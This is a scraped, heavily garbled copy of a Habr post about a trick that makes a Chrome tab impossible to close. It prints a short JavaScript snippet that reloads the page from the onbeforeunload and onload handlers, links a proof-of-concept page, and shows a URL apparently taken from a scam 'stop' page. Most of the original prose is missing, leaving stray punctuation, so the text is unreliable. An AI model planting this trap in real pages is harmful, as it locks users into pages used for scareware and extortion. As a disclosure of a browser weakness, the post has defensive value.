📜 ⬆️ ⬇️

Open tab in Chrome


A simple trick allows you to create a page that cannot be closed in Google Chrome.

Proof: zhovner.com/tmp/chrome-trap.html

Malicious code looks extremely simple:
')
     onbeforeunload=function(){
         location.reload();
            return "   ...";
      };
      onload=function(){
         location.reload();
      }


- , .
, :

://stop.podzone.org/stop_ip.php?gorod=Moscow&ip=127.0.0.1&sid=1&br=1

image

Source: https://habr.com/ru/post/243963/


All Articles